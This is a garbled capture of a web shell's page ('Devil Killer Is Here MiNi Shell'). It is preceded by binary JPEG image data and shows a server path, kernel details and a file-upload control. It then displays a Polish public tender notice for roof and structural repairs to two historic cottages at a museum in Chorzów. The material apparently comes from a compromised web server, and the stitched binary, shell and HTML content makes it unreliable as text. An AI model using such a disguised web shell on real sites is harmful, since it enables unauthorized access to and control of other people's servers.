JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230713/0030477701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wymiana pokryć gontowych i naprawa konstrukcji w chałupie z z Bażanowic (GPE-113) oraz w chałupie z Katowic (GPE-2312). </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum &#34;Górnośląski Park Etnograficzny w Chorzowie&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000278623</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Parkowa 25</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chorzów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">322410718</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">322415501</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@muzeumgpe-chorzow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muzeumgpe-chorzow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana pokryć gontowych i naprawa konstrukcji w chałupie z z Bażanowic (GPE-113) oraz w chałupie z Katowic (GPE-2312). </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3996283a-1ee5-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00304777</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00039427/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Wymiana pokryć gontowych i naprawa konstrukcji w chałupie z Bażanowic (GPE-113) oraz w chałupie z Katowic (GPE-2312).</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3996283a-1ee5-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiajacym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia https://ezamowienia.gov.pl (komunikacja wymaga zarejestrowania sie na Platformie e-Zamówienia i jest dostępna bezpłatnie dla każdego zalogowanego użytkownika platformy)<br/>*poczty elektronicznej, z zastrzeżeniem, iż oferta musi zostać złożona przy użyciu platformy e-Zamówienia.<br/>2.Zamawiający zastrzega, iż złożenie oferty w innej formie elektronicznej będzie skutkowało odrzuceniem oferty na podstawie art.226 ust.1 pkt.6.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym, a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl ( komunikacja wymaga zarejestrowania się na Platformie e-Zamówienia i jest dostępna bezpłatnie dla każdego zalogowanego użytkownika platformy). <br/>2.	Korzystanie z Platformy e-Zamowienia jest bezpłatne.<br/>3.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>4.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. <br/>5.	Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze: ( „Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik).10.6	W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/ podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu ( zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.), dalej „RODO”, zamawiający informuje, że:<br/>22.1	Administratorem danych osobowych jest Muzeum „Górnośląski Park Etnograficzny w Chorzowie”, ul. Parkowa 25, 41-500 Chorzów.<br/>22.2	Administrator wyznaczył Inspektora Ochrony Danych, z którym można się skontaktować w sprawach związanych z ochroną danych osobowych, w następujący sposób:<br/>1)	pod adresem poczty elektronicznej: iod@muzeumgpe-chorzow.pl.<br/>2)	pisemnie na adres siedziby Administratora.<br/>22.3	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego.<br/>22.4	Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t. j. Dz. U. z 2021 r. poz. 1129 z późn. zm.), dalej „ustawa Pzp”.<br/>22.5	Dane osobowe będą przechowywane jedynie w okresie niezbędnym do spełnienia celu, dla którego zostały zebrane lub w okresie wskazanym przepisami prawa.<br/>22.6	Po spełnieniu celu, dla którego dane zostały zebrane, mogą one być przechowywane jedynie w celach archiwalnych, przez okres, który wyznaczony zostanie przede wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych, chyba że przepisy szczególne stanowią inaczej.<br/>Obowiązek podania danych osobowych bezpośrednio dotyczących Wykonawcy/Podwykonawcy/Podmiotu, na zasoby którego powołuje się Wykonawca, jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>22.7	W odniesieniu do udostępnionych danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>22.8	Osoba udostępniająca dane posiada:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych jej dotyczących;<br/>b)	na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy<br/><br/>w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.);<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.);<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna, że przetwarzanie danych osobowych jej dotyczących narusza przepisy RODO.<br/>22.9	Osobie udostępniającej dane nie przysługuje:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>22.10	Wykonawca/Podwykonawca/Podmiot, udostępniający zasoby składa oświadczenie w zakresie wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO (załącznik nr 1 do SWZ/załącznik nr 2a do SWZ).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DOZ.331.4.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na przeprowadzeniu prac konserwatorskich więźby dachowej wraz z wymianą pokrycia dachowego z gontu na chałupie z Bażanowic, nr inwentarzowy GPE-113 oraz chałupie z Katowic, nr inwentarzowy GPE-2312.<br/>Prace będą polegały na wymianie pokrycia dachowego z gontu na nowe, wymianie zdegradowanych łat, miejscowych naprawach i wymianach zdegradowanych elementów konstrukcji dachowej, impregnacji starych elementów konstrukcji dachowej, ponadto w chałupie z Bażanowic: wymianie desek powały i rekonstrukcji polepu, naprawy , wzmocnieniu i częściowej wymianie konstrukcji ganka. Szczegółowy opis zamówienia zawarty jest w programach konserwatorskich ( załącznik nr 5), Specyfikacji Technicznych Wykonania i Odbioru Robót ( załącznik nr 4 ), przedmiarach robót – załącznik nr 6 ( ze względu na przyjęte rozliczenie ryczałtowe ma charakter pomocniczy) oraz ogólnych warunkach umowy ( załącznik nr 7). Zamawiający dopuszcza użycie preparatów wymiennych w stosunku do zaproponowanych w programach konserwatorskich, pod warunkiem, że będą miały tożsame właściwości chemiczne. <br/>Okres gwarancji i rękojmi za wady: Zamawiający wymaga minimalnego okresu gwarancji <br/> i rękojmi tj. 5 lat (60 m-cy). Gwarancja i rękojmia za wady jest również jednym z kryteriów <br/> oceny ofert.<br/>3.2	Dodatkowe informacje <br/><br/> Chałupa z Katowic <br/><br/>1)	RODZAJ: budownictwo drewniane, budynek mieszkalny<br/>2)	AUTOR, WARSZTAT, SZKOŁA: nieznane, lokalny <br/>3)	TECHNIKA: ciesiołka <br/>4)	LOKALIZACJA: Muzeum „ Górnośląski Park Etnograficzny w Chorzowie”<br/> ul. Parkowa 25, 41-500 Chorzów <br/>5)	WŁAŚCICIEL: j.w. <br/>6)	UŻYTKOWNIK: j.w. <br/>7)	WYMIARY:Dł.:1200 cm; Szer.:740 cm; Wys.:600 cm; Pow:. 89,83 cm;, <br/>8)	WCZEŚNIEJSZE KONSERWACJE: brak danych <br/>9)	WPIS DO INWENTARZA MUZEUM: nr inw. GPE-2312<br/>OPIS: <br/>Wolnostojąca, wzniesiona na planie prostokąta, na podmurówce ceglano-kamiennej. Konstrukcja zrębowa, belki łączone częściowo na jaskółczy ogon i częściowo na obłap, doszczelnione mszeniem. Nakryta dachem półszczytowym z przydaszkiem. Konstrukcja dachowa krokwiowo-jętkowa. Dach kryty gontem. Wnętrze w układzie dwutraktowym,<br/>z sienią przelotową i izbą na osi. Fasada symetryczna trójosiowa, z laubą na osi. Drzwi wejściowe, jednoskrzydłowe, okna dwuskrzydłowe, krosnowe. Wnętrze z wyjątkiem sieni<br/>i komory za kuchnią tynkowane i malowane, sień i komora bielone. Podłogi drewniane,<br/>w sieni ceglana, na strychu polepa. Instalacje:, elektryczna, sygnalizacji p.poż i włamania. Ogrzewanie: czynne, węglowe, pieco-kuchnia kaflowa w kuchni. <br/>Prace polegają na wymianie pokrycia gontowego na budynku i laubie oraz przeprowadzeniu niezbędnych napraw konstrukcji dachowej zgodnie z opisem szczegółowym zawartym w programie prac konserwatorskich, STWIORB i przedmiarze oraz na demontażu i ponownym montażu instalacji p.poż. i sygnalizacji włamania w koniecznym zakresie. Instalacja podlega gwarancji, demontaż wymaga uzgodnienia z gwarantem. <br/><br/>Chałupa z Bażanowic <br/><br/>1)	RODZAJ: budownictwo drewniane, budynek mieszkalny<br/>2)	AUTOR, WARSZTAT, SZKOŁA: nieznane<br/>3)	TECHNIKA: ciesiołka<br/>4)	LOKALIZACJA: Muzeum „ Górnośląski Park Etnograficzny w Chorzowie” ul. Parkowa 25,41-500 Chorzów<br/>5)	WŁAŚCICIEL: j.w.<br/>6)	UŻYTKOWNIK: j.w.<br/>7)	WYMIARY: wys.: 670 cm, szer.: 1136cm, głęb.: 610 cm, <br/>8)	WCZEŚNIEJSZE KONSERWACJE: W 1995 roku położono nowe klepisko a w 2013 roku przeprowadzono impregnację zrębu oraz więźby dachowej preparatami Boramon oraz Drewnochron. <br/>9)	WPIS DO INWENTARZA MUZEUM: nr inw. GPE-113<br/>OPIS: <br/>Budynek wchodzi w skład ekspozycji plenerowej Muzeum „Górnośląski Park Etnograficzny w Chorzowie” reprezentuje walory ludowego budownictwa regionu cieszyńskiego, wraz<br/>z Kuźnią z Zamarsk oraz stodołą z Ustronia tworzą zagrodę średnio bogatego chłopa. <br/>Budynek mieszkalny jednokondygnacyjny ze strychem, podpiwniczony, posadowiony na lekkim wzniesieniu opadającym w kierunku drogi, szerokofrontowy. Ściany wzniesione na podmurówce z kamieni, konstrukcja ścian zrębowa na planie prostokąta. W narożach wiązana na nakładkę w dolnych 2 wieńcach, pozostałe na obłap bez ostatków. Przerwy między belkami wypełnione mchem. Od frontu dostawiony ganeczek o konstrukcji słupowej zwany pawłoczką, z ganku prowadzi zejście do murowanej piwnicy z kamieni i cegieł<br/>o sklepieniu kolebkowym. Chałupa przykryta jest dachem dwuspadowym półszczytowym, konstrukcja więźby krokwiowo – jętkowa, kryta gontem, od frontu okap częściowo wydłużony nad ganeczkiem. Szczyty szalowane pionowymi deskami z wyciętym świetlikiem w kształcie gwiazd.<br/>Do budynku prowadzą kamienne schody z drewnianą balustradą wykonaną z listew. <br/>Drzwi: Do wnętrza chałupy prowadzą dwa otwory wejściowe umieszczone w dłuższych ścianach budynku na osi. Oba otwory wypełnione drzwiami drewnianymi deskowo –listwowych.<br/>Drzwi wewnętrzne prowadzące z sieni do poszczególnych pomieszczeń otwierane do sień (oprócz drzwi prowadzących do chlewa) deskowo-listwowe na zawiasach (3 szt. wtórne).<br/>Okna: Chałupa posiada 5 otworów okiennych. W elewacji frontowej dwa otwory, w elewacjach szczytowych jeden i w drugiej elewacji dwa. Okna są drewniane, pojedyncze, otwierane, dwuskrzydłowe, każde ze skrzydeł podzielone na trzy kwatery. Pod oknami drewniane parapety.<br/>Wnętrze chałupy podzielone na cztery pomieszczenia: kuchnia, izba, komora, chlew, rozmieszczone symetrycznie po obu stronach sieni, zajmującej centralą część obiektu. Strych<br/>i piwnica jednoprzestrzenne. <br/>Wewnątrz chałupy ściany bielone wapnem oprócz komory i chlewu.<br/>Podłogi: drewniane w izbie i kuchni oraz komorze, w sieni oraz chlewie klepisko, dodatkowo<br/> w chlewie ułożone brusy z drewna.<br/>Stropy drewniane z desek kładzionych na zakładkę wzdłuż dłuższej ściany, przybijane do tragarzy. Od strony strychu powierzchnia pokryta jest ubitą warstwą gliny wraz ze słomą. <br/>Instalacja: sygnalizacji p.poż i włamaniowa, elektryczna.<br/>Ogrzewanie piecowe. <br/>Prace polegają na wymianie pokrycia dachowego wraz z koniecznymi naprawami konstrukcji dachowej, wymianie desek powały i rekonstrukcji polepy, demontażu instalacji p.poż i sygnalizacji włamania w koniecznym zakresie, naprawy , wzmocnieniu i częściowej wymianie konstrukcji ganka. Instalacja p.poż i sygnalizacji włamania podlega gwarancji, demontaż wymaga uzgodnienia z gwarantem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45422000-1 - Roboty ciesielskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45212350-4 - Budynki o szczególnej wartości historycznej lub architektonicznej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-09-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium I - cena (C) - waga 60%<br/>C = (cena najniższa spośród wszystkich ofert/cena badanej oferty) x 100 punktów x 60%<br/>Kryterium II – wydłużenie okresu gwarancji jakości i rękojmi za wady (G)- waga 40%<br/>Zamawiający przyzna wykonawcy 1 punkt za każdy zadeklarowany w formularzu oferty dodatkowy rok gwarancji jakości i rękojmi za wady powyżej wymaganego minimalnego okresu w wymiarze 5 lat, lecz nie więcej niż 2 dodatkowe lata (maksymalnie 2 punkty); w przypadku braku wpisania w formularzu oferty dodatkowego roku gwarancji i rękojmi za wady, Zamawiający przyzna w tym kryterium „0” punktów; w przypadku wskazania dłuższego dodatkowego okresu gwarancji jakości i rękojmi za wady niż 7 lat, Zamawiający przyzna maksymalnie 2 punkty w tym kryterium. Natomiast jeśli zostanie wybrany wykonawca, który nie zaznaczył żadnego dodatkowego roku gwarancji jakości i rękojmi za wady, będzie zobowiązany do gwarancji minimalnej w wymiarze 5 lat. <br/> 1 rok = 1 pkt ( łącznie 6 lat)<br/>2 lata= 2 pkt ( łącznie 7 lat)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużenie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolności do występowania w obrocie gospodarczym – NIE DOTYCZY;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – NIE DOTYCZY;<br/>3) sytuacji ekonomicznej lub finansowej – NIE DOTYCZY;<br/>4)	zdolności technicznej lub zawodowej 